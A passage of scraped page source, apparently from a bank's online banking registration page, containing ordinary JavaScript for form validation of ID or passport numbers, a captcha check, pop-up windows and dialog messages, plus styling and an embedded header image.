document.frmmain.elements[i].value+'~'+document.frmmain.flddelrefno.value; } } } if(flgbtn==false){ alert("Please select a file to remove"); return false; } document.frmmain.fldSectionId.value = p_sectionid ; //document.frmmain.fldPrevRequestId.value = p_prevrequestid; return SendTxnRequest(p_requestid.substring(5,7),p_requestid.substring(2,5)); } //----------------------------------------------------------------------------------------- function checkForAuditLogFrame() { var l_auditWindName = self.name; // setting self.name in l_auditWindName // compare it with frame self.name if it matches with SSR or VAL frame name // put modal window. if(l_auditWindName=="frame_audit_txn"){ if(document.getElementById("divsession")) { document.getElementById("divsession").style.display = ""; } } } //----------------------------------------------------------------------------- function displayBackwardCompatibilityStatusMessage () { return; } //----------------------------------------------------------------------------- function fnToggleComponent ( toggledivid , urlimageopen , urlimageclose ) { var sectionId = document.getElementById (toggledivid); if (sectionId == null) { return; } var imgSrc = document.getElementById ("img_" + toggledivid); if (imgSrc == null) { return; } if (sectionId.style.display == '' || sectionId.style.display == 'block') { sectionId.style.display = 'none'; imgSrc.src = urlimageclose; } else { sectionId.style.display = ''; imgSrc.src = urlimageopen; } } //----------------------------------------------------------------------------- //----------------------------------------------------------------------------------------- function custom_alert(output_msgs, title_msg) { var out_msg; if ($.isArray (output_msgs)) { if (output_msgs.length > 1) { out_msg = "<ul><li>"; for (i = 0; i < output_msgs.length; i++) { out_msg += output_msgs [i]; if (i + 1 != output_msgs.length) { out_msg += "</li><li>"; } } out_msg = "</li></ul>"; } else { out_msg = output_msgs [0]; } } else { out_msg = output_msgs; } $("<div></div>").html(out_msg).dialog({ title: title_msg, resizable: false, modal: true, buttons: { "Ok": function() { $( this ).dialog( "close" ); } } }); } //------------------------------------------------------------------------ //------------------------------------------------------------- function staticwindow_open ( p_formObj , p_windowTitleText , p_id ) { if (!p_formObj){ p_formObj = document.frmEntitySwitch; } var window_name = 'process_' + p_id; var frm_action; var l_windowObj = window.open ( '' , window_name , 'toolbar=0,location=0,directories=0,status=1,menubar=0,scrollbars=1,resizable=0,left=0,top=0,width=' + window.screen.width + ',height=' + window.screen.height ); l_windowObj.moveTo(0, 0); l_windowObj.resizeTo(screen.width, screen.height); p_formObj.target = window_name; if (p_formObj.title || p_formObj.title != '') { p_formObj.title.value = p_windowTitleText; } else { var l_inputTitle = document.createElement ('input'); l_inputTitle.type = 'hidden'; l_inputTitle.name = 'title'; l_inputTitle.value = p_windowTitleText; p_formObj.appendChild (l_inputTitle); } p_formObj.fldRequestId.value = p_id; frm_action = p_formObj.action; p_formObj.action = "process.jsp" if (l_windowObj) { l_windowObj.focus (); } p_formObj.submit (); p_formObj.action = frm_action; } //---------------------------------------------------------------------------- function fnGetAppLayRelWidth () { return l_appLayWidth - 25; } //---------------------------------------------------------------------------- </script><div id="divsession" class="modalWhitebackground" style="display:none" ></div><div id="errorTab" style="display:none;height:auto;width:100%;cursor:hand; " ></div><div id="printWarning" class="noPrintWarning" ><div class="iconHolder warningMsg" ></div><div class="alertmsgbox" ></div></div><div id="dialog-modal-error" title="Messages" ><table id="error-dialog-table" style="width:100%;display:none" cellpadding="1" cellspacing="1" ></table></div><html lang="en" ><head><!--[if lte IE 7]><link rel="stylesheet" href="https://ib.mcb.mu/T001/css/eng_01.css" type="text/css" /><![endif]--><![if (!IE) | (gte IE 8)]><link rel="stylesheet" href="https://ib.mcb.mu/T001/css/eng_01.uri.css" type="text/css" /><![endif]><meta name="viewport" content="width=device-width; initial-scale=1; minimal-ui" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" ></meta><meta HTTP-EQUIV="no-cache" ></meta><title></title><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/Ajax.js" ></script><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/common.js" ></script><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/rsa_compiled.js" ></script><script language="JavaScript" type="text/JavaScript" > function fnBack(){ $("input[type='button']").prop('disabled',true); document.frmmain.fldRequestId.value='RRUSR11'; document.frmmain.submit(); } function fnSubmit(){ $("input[type='button']").prop('disabled',true); if($("#fldnicno").prop("checked")) { if($.trim($("#fldIdentificationNoNic").val())=='' || $.trim($("#fldIdentificationNoNic").val()).length !=$("#fldIdentificationNoNic").val().length ||$.trim($("#fldIdentificationNoNic").val()).length < 14 || /\s/g.test($('#fldIdentificationNoNic').val())){ $("#fldIdentificationNoNicInline").css("display","block"); $("#fldIdentificationNoNic").addClass("input-error"); $("input[type='button']").prop('disabled',false); return false; } else{ $("#fldIdentificationNoNicInline").css("display","none"); $("#fldIdentificationNoNic").removeClass("input-error"); } } else if($("#fldpassportno").prop("checked")) { if($.trim($("#fldIdentificationNoPass").val())=='' || $.trim($("#fldIdentificationNoPass").val()).length !=$("#fldIdentificationNoPass").val().length ||$.trim($("#fldIdentificationNoPass").val()).length < 5 || /\s/g.test($('#fldIdentificationNoPass').val())){ $("#fldIdentificationNoPassInline").css("display","block"); $("#fldIdentificationNoPass").addClass("input-error"); $("input[type='button']").prop('disabled',false); return false; } else{ $("#fldIdentificationNoPassInline").css("display","none"); $("#fldIdentificationNoPass").removeClass("input-error"); } } if(validateCaptcha()){ document.frmmain.fldRequestId.value='RRUSR03'; document.frmmain.submit(); } else{ return false; } } function toggleIdentificationNo(selradio) { $("#fldIdentificationNoNic").val(''); $("#fldIdentificationNoPass").val(''); $("#fldIdentificationNoPassInline").css("display","none"); $("#fldIdentificationNoPass").removeClass("input-error"); $("#fldIdentificationNoNicInline").css("display","none"); $("#fldIdentificationNoNic").removeClass("input-error"); if(selradio.id=='fldnicno'){ $("#fldIdentificationNoPass").prop('disabled',true); $("#fldIdentificationNoPass").css('background',"#f0f0f0 none repeat scroll 0 0"); $("#fldIdentificationNoNic").prop('disabled',false); $("#fldIdentificationNoNic").css('background',""); } else if(selradio.id=='fldpassportno'){ $("#fldIdentificationNoNic").prop('disabled',true); $("#fldIdentificationNoNic").css('background',"#f0f0f0 none repeat scroll 0 0"); $("#fldIdentificationNoPass").prop('disabled',false); $("#fldIdentificationNoPass").css('background',""); } } function isValid(evt) { var charCode = (evt.which) ? evt.which : evt.keyCode; var retVal = ((charCode >= 48 && charCode <= 57) || ///0-9 Number ASCII (48~57) (charCode >= 65 && charCode <= 90) || ///A~Z Upper Case Alphabet ASCII (65~90) (charCode >= 97 && charCode <= 122) ///a~z Lower Case Alphabet ASCII (97~122) ); if (retVal ==false) { return false; } else { return true; } } </script></head><body class="workarea" onload="getCaptchaImage();" style="width:auto;" ><style> #headerWrapper { background: #fff; border-bottom: 1px solid #ececec; position: absolute; width: 100%; height: 72px; top: 0; left: 0; margin: 0; padding: 0; border: 0; } #header { padding: 0; position: relative; width: 960px; margin: 0 auto; border: 0; } #_topMenu { width: 100%; height: 70px; background-repeat: no-repeat; background-image: url(data:image/jpeg;base64,/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP/sABFEdWNreQABAAQAAABkAAD/4QMvaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLwA8P3hwYWNrZXQgYmVnaW49Iu+7vyIgaWQ9Ilc1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCI/PiA8eDp4bXBtZXRhIHhtbG5zOng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJBZG9iZSBYTVAgQ29yZSA1LjYtYzAxNCA3OS4xNTY3OTcsIDIwMTQvMDgvMjAtMDk6NTM6MDIgICAgICAgICI+IDxyZGY6UkRGIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyI+IDxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiIHhtbG5zOnhtcD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bXA6Q3JlYXRvclRvb2w9IkFkb2JlIFBob3Rvc2hvcCBDQyAyMDE0IChXaW5kb3dzKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo5MzUzN0VBQzI3RTQxMUU2OEZFQjgzQ0VFNDc0MzI1NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo5MzUzN0VBRDI3RTQxMUU2OEZFQjgzQ0VFNDc0MzI1NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjkzNTM3RUFBMjdFNDExRTY4RkVCODNDRUU0NzQzMjU2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjkzNTM3RUFCMjdFNDExRTY4RkVCODNDRUU0NzQzMjU2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+/+4ADkFkb2JlAGTAAAAAAf/bAIQAAQEBAQEBAQEBAQEBAQEB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